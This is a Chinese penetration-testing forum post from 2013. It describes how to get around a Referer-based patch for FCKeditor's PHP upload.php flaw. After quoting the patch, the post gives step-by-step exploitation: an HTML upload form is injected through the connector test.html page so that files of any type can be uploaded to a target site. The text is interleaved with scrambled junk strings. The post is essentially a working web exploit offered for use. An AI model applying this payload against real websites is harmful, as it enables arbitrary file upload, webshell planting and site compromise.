中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
$ |6 f& l$ X9 G0 j) e! ]8 D
网上给出的修复方案是
6 Z" O2 w1 ~7 a, J; j
修复方法,删除FCK编辑器用其他的编辑器
. L7 o* h2 I+ O/ \ Z
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
2 \/ l F, W& H8 \
在
_; \+ C# d |/ T4 f
require(‘config.php’);
( _% s! F$ t/ H
require(‘util.php’);
! R7 w# g2 r7 J: a: Q
的下面添加以下代码—————————–
- N" L. z+ |7 t1 p* S
//防止外部提交
1 t S( a. l* h# P4 U
function outsidepost()
' d9 H& D: u# E/ g; T
{
( S! w& g* \+ l3 S, K# w
$servername=$_SERVER['SERVER_NAME'];
' T4 k, v a( ^9 u. k
$sub_from=@$_SERVER['HTTP_REFERER'];
, c4 O5 s, Z8 y8 M
$sub_len=strlen($servername);
3 K) c' [: }: o0 S" X4 U4 s; }
$checkfrom=substr($sub_from,7,$sub_len);
2 a. V' J5 B, _
if($checkfrom!=$servername){
8 `6 Y K n6 @2 E4 O
echo(“you don’t outsidepost!”);
: E+ [( M- R2 P% Y" o& a0 J4 O5 a
exit;
# f! c, }6 z6 G- L
}
9 z3 y& {9 n$ p. L, q
}
- d7 x8 n, o& ?: K7 S
outsidepost();
* ~3 m0 J' I4 [# G( @
防止外部提交,但是没有防止内部提交,
* t/ q8 V* ]; Z( f" j( ]
利用方法:
. b# l# M. X, ^
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
8 u P$ T, S& r v7 K2 A
2,在Current Folder 框输入
! m7 `2 \) [) b! v) s
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
2 l c$ Q$ d- [* N
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
( K4 m/ D! Q) B$ _) G. A
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2